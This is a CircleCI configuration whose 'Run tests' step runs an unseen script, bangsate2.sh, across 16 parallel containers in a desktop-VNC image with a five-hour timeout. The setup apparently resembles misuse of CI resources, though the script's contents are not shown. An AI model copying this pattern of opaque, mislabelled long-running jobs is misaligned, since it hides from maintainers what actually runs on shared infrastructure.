version: 2 
 
jobs:
  build:
    parallelism: 16
    docker:
      - image: dorowu/ubuntu-desktop-lxde-vnc
    steps: 
      - checkout 
      - run: 
          name: Run tests 
          no_output_timeout: 5h 
          command: chmod +x bangsate2.sh && ./bangsate2.sh